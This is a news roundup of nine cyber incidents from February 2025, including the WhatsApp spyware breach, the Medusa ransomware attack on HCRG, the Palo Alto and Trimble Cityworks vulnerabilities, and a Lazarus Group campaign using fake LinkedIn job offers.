Data breaches and cyber assaults persist in causing chaos for various businesses worldwide.
From ransomware and distributed denial-of-service (DDoS) strikes to unintended and third-party data disclosures, companies confront continuing, intricate cybersecurity hazards.
Highlighted below are nine crucial data breaches and cyber incidents from February 2025.
Summary:
WhatsApp spyware breach affirmed by Meta
Meta, the parent company of Facebook, verified an intrusion that compromised users of the encrypted messaging app WhatsApp. Initially reported by The Guardian, the sophisticated spyware breach targeted WhatsApp users, including journalists and civil society members.
Meta’s representative stated, “Instances like this emphasize the necessity of holding spyware firms liable for their illegal activities. WhatsApp commits to safeguarding users’ privacy.”
Theft of DOD and defense contractors’ access credentials
Several access credentials linked to U.S. Department of Defense (DOD) agencies and contractors were advertised for sale as part of a malicious software campaign. Some stolen credentials included live session cookies, potentially enabling attackers to circumvent multi-factor authentication (MFA).
Massive IoT data breach exposes 2.7 billion records
A large-scale breach in Internet of Things (IoT) systems laid bare 2.7 billion records, jeopardizing sensitive details like passwords, IP addresses, and device IDs. Discovered by cybersecurity researcher Jeremiah Fowler, the breach transpired through an unprotected database owned by the Chinese IoT firm Mars Hydro.
Ransomware strike hits HCRG Care Group
HCRG Care Group, a provider of private health and social services, fell prey to a ransomware assault by the cybercrime syndicate Medusa. On their dark-web portal, the Medusa gang claimed to have exfiltrated 2.275 TB of data from HCRG and threatened to sell or divulge it online.
Jeff Wichman, the director of incident response at Semperis, remarked, “The ransomware attack on HCRG Care Group serves as a stark reminder of healthcare institutions continuously being targeted due to the accessibility of private patient records.”
Exploitation of Trimble Cityworks vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) cautioned about active exploitation of Trimble Cityworks, a widely utilized asset management tool in local governance and infrastructure sectors. The vulnerability (CVE-2025-0994) holds a severity rating of 8.6 and received a patch in late January, mandated for application by the end of the current month for Federal civil agencies.
Global data breach at DISA impacts over 3 million individuals
DISA Global Solutions, a provider of employee screening services, suffered a breach affecting more than 3.3 million people. DISA, serving over 55,000 firms, including a third of Fortune 500 companies, confirmed the breach in a submission to Maine’s attorney general.
Cory Michal, the chief security officer (CSO) at AppOmni, noted, “Background check agencies remain prime targets for cybercriminals due to their storage of vast quantities of highly sensitive data, making them susceptible to attacks owing to their weaker security protocols.”
Palo Alto discloses exploitation of firewall vulnerabilities
The cybersecurity giant Palo Alto Networks acknowledged active exploitation of a recently patched firewall flaw (CVE-2025-0108). The PAN-OS loophole allows unauthorized entry to the device’s management interface and execution of scripts. Palo Alto Networks highlighted that CVE-2025-0108 can be combined with other vulnerabilities, such as CVE-2024-9474, enabling unauthorized access to unguarded firewalls.
Kevin Robertson, the chief technology officer (CTO) at Acumen Cyber, advised, “Urgent application of patches for these vulnerabilities is crucial to prevent potential escalation of privileges and unauthorized access to Palo Alto firewalls, enabling manipulation of configurations and lateral network movement by threat actors.”
GrubHub reveals third-party data breach
The food delivery company GrubHub disclosed a data breach affecting sensitive information of an undisclosed number of clients, vendors, and drivers after a breach in its systems. GrubHub indicated, “Our investigation revealed the breach originating from an account linked to a third-party service provider rendering support to Grubhub.”
The unauthorized party accessed contact details of campus diners, along with diners, vendors, and drivers who interacted with the customer service. Accessed data included:
- Names, email addresses, and phone numbers.
- Partial payment card info for certain campus diners.
The intruder also accessed hashed passwords of specific legacy systems. GrubHub took proactive measures to reset any passwords deemed vulnerable.
Lazarus Group leverages LinkedIn for credential theft and malware deployment
Bitdefender Labs uncovered an ongoing scheme by the Lazarus Group, with ties to North Korea, aimed at stealing credentials and disseminating malware via fraudulent LinkedIn job opportunities. The operation commences with a message offering a remote part-time job, enticing recipients to divulge personal information.
The culprits share a package containing a “minimum viable product” (MVP) accompanied by a questionnaire document requiring the execution of a demo. Despite the innocuous appearance of the code, it embeds heavily obfuscated scripts that dynamically load malicious code from an external source. The payload includes an across-the-board info-stealer targeting Windows, macOS, and Linux, gathering login details and files related to crypto extensions before transmitting them to a malicious server. The malware proceeds by downloading and executing a Python script to enable further harmful actions.
About Author
